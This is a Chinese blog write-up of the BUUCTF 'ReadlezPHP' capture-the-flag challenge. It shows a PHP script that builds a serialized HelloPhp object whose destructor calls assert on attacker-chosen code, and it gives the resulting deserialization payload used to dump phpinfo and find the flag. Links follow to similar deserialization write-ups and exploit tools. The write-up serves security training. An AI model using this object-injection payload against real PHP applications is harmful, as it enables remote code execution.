BUUCTF--ReadlezPHP(反序列化简单应用)()

最新推荐文章于 2024-09-04 09:27:16 发布
最新推荐文章于 2024-09-04 09:27:16 发布
阅读量268 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cainiao17441898/article/details/119711306
版权

目录扫描之后发现没有文件泄露。
查看一下源码发现了两个链接。
在这里插入图片描述
源码:
在这里插入图片描述
PHP魔术方法:magic
这里eval没有用了不知道为啥(可能被过滤了吧)。
这里用了assert截断函数(作用跟eval差不多,eval里面的语句要以;结尾)
这里用蚁剑连接会连不上,就先查看一下phpinfo的信息。
生成payload:

<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a ='phpinfo()';
        $this->b ='assert';
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;
echo serialize($c)
?>

payload:O:8:“HelloPhp”:2:{s:1:“a”;s:9:“phpinfo()”;s:1:“b”;s:6:“assert”;}
这里就发现flag了。
在这里插入图片描述

熊是本熊
关注
ShiroExp-1.3.1-all.jar shiro反序列化检测工具
01-12
ShiroExp-1.3.1-all.jar shiro反序列化检测工具 我这里是用于搭建攻防演练演示环境用
CTF之路:关于PHP eval() 注入问题
zw05011的博客
01-03 5167
CTF之路:关于PHP eval() 注入问题
[BUUCTF][NPUCTF2020]ReadlezPHP
朋克归零膏的博客
10-28 359
执行函数的方式挺有意思,但是平时自己就怎么总结过各种php执行代码的方式,现在总结一下。
BUUCTF】AreUSerialz (反序列化
最新发布
徐徐徐的博客
09-04 652
当遇到不可打印字符被过滤时,有两种方法:PHP版本>=7.2时,可将protected直接修改为public将序列化后的字符串中的%00修改为\00,并将保护类型为protected的变量的变量类型由s改为S。
php反序列化-BUUCTF刷题记录
永远都没有了
11-30 967
在前面得知要想获取flag,必须恒等于相对应对象成员的变量,这里也不在解释了。继续分析第二部分,可以看见这部分代码属于传参的判断语句,简单来说,你想要控制第一部分的成员变量的恒等于获得flag,就必须要从最后一个php语句的obj进行接受传参内容,前提是让以上的if条件的判断为真。我们先看第一部分较为关键的代码,可以清楚的看见要想获取flag,就必须要让BUU类对象的成员correct的变量恒等于input成员的变量。序列化payload:O:3:“BUU”:2:{s:7:“correct”;
BUUCTF-web [极客大挑战 2019]PHP1 之 反序列化漏洞
yu_jing_hong的博客
12-02 2935
PHP反序列化漏洞 一,什么是序列与反序列 序列就是把数据转成可逆的数据结构,目的是方便数据的储存和传输,反序列就是将数据逆转成原来的状态,序列就是拆数据,使得传输或储存更容易的过程,反序列就是重新拼凑还原数据的过程。 二,PHP中的反序列方法 PHP通过string serialize ( mixed $value )和mixed unserialize ( string $str )两个函数实现序列化和反序列化。 序列化:serialize()将一个对象转换成一个字符串。反序列化:un.
CTFbuuctf web(三)——PHP序列化与反序列化
m0_52923241的博客
08-04 1883
[极客大挑战 2019]PHP 题目类型:序列化与反序列化 这儿提示备份网站,用dirsearch扫一下后台目录 输入:python dirsearch.py -u http://9b76aef7-3183-4da4-a909-0f95ad5b6607.node4.buuoj.cn -e php 找到www.zip,访问一下 跳出弹窗,点击下载 发现有flag.php目录 <?php $flag = 'Syc{dog_dog_dog_dog}'; ?> 无用信息 查看index.php
S24-C3P0反序列化1
08-03
S24-C3P0反序列化1 S24-C3P0反序列化是指利用C3P0结合ROME二次反序列化注入内存马的漏洞攻击方法。该攻击方法主要利用fastjson的反序列化漏洞,结合C3P0和ROME的反序列化机制,实现远程代码执行的攻击。 在了解S24...
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
marshalsec命令格式如下: java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> []] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的...
S23-MySQL-JDBC反序列化1
08-03
MySQL-JDBC反序列化漏洞是一种安全风险,出现在MySQL的Java驱动程序中,允许攻击者通过特定的JDBC连接参数触发反序列化过程,可能导致远程代码执行。这种漏洞主要利用了MySQL Connector/J,它是MySQL数据库与Java...
dotnet-Unity最快的序列化反序列化工具
08-15
"dotnet-Unity最快的序列化反序列化工具"是一个专为提升.NET开发效率而设计的解决方案,特别是在Unity环境中。这个工具被称为DreamSerialize,从其文件名"DreamSerialize-master"可以推断,它可能是开源项目,并且是...
【Web方向】 3-1 PHP反序列化buuCTF实例UnserializeOne wp
wanderer的博客
11-16 623
BUUCTF PHP反序列化UnserializeOne wp,过程有点绕脑……
buuctf easy_serialize_php 解析
qq_73722777的博客
03-29 200
因为我们要让img的内容为d0g3_f1ag.phpbase64编码后的字符串,于是我们尝试直接给_SESSION[img]赋值。s:59:"a做为user的属性值,读取到a的时候结束,后面的;进行了闭合,相当于吞掉了一个属性和值,接着会继续读取我们构造的img,由于总共三个属性,我在后边加上了一个属性和值,后边的序列化结果直接就被丢弃。将这里的user和function进行修改,然后这里会进行代码一开始的过滤,将变量$img中的php flag php5 php4 fl1g的字符串替换成’'空字符。
CTF php反序列化总结
m0_53567065的博客
11-17 4812
前言:本⼈⽔平不⾼,只能做⼀些类似收集总结这样的⼯作,本篇文章是我自己在学php反序列化写的一篇姿势收集与总结,有不对的地方欢迎师傅们批评指正~定义:序列化就是将对象转换成字符串。反序列化相反,数据的格式的转换对象的序列化利于对象的保存和传输,也可以让多个文件共享对象。漏洞原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化的过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。常用魔术方法
[NPUCTF2020]ReadlezPHP【web系列】
shutTD的博客
10-05 470
打开题目发现是一个帅帅的界面发现什么有用的,那就f12康康有什么有用的,仔细查看每一个标签发现有一个网址我们跟着点进去一看发现是一段源代码,那这里就是解题的入口了看到就知道这道题是php反序列化了,所以接下来就是php反序列化做题流程。这题反序列化链很短,入口即终点,我们跟进发现那么这里就是个危险函数了也是我们的解题的最终步骤,在这里我们就需要认识一个函数了。
[NPUCTF2020]ReadlezPHP
wp568的博客
08-15 260
2. HelloPhp这个类的析构函数会执行echo $b($a)代码,当b=system,a=phpinfo()时,会执行函数查看到phpinfo界面。3. 可以构建HelloPhp的序列化字符串,data传入时反序列化就会执行析构函数。获取HelloPhp类的序列化字符串:这里屏蔽了system,改用了assert。1. 需要我们输入data参数,之后将data参数反序列化执行。查看phpinfo获取到flag。
web:[NPUCTF2020]ReadlezPHP
sleepywin的博客
11-27 359
并在构造函数中将它们分别初始化为字符串 "Y-m-d h:i:s" 和 "date"。函数将当前文件的源代码高亮显示并输出,然后终止程序。然后,通过判断 GET 请求中是否包含参数。符号将可能产生的错误屏蔽,防止错误信息泄露。这段代码是一个简单PHP 类,名为。,它在对象销毁时被调用。猜测可能是过滤了部分函数,尝试用别的。发现一个网址,访问这个页面查看。参数反序列化为对象,并使用。发现其他的线索,查看源代码。函数将 GET 请求中的。类中还定义了一个析构函数。之后的代码中,创建了一个。
BUUCTFphp反序列化
yzl_007的博客
10-23 992
BUUCTFphp反序列化 [极客大挑战 2019]PHP __wakeup()绕过 有备份,盲猜www.zip,下载了网站源码,class.php 引用了flag.php //class.php <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function _
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

熊是本熊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值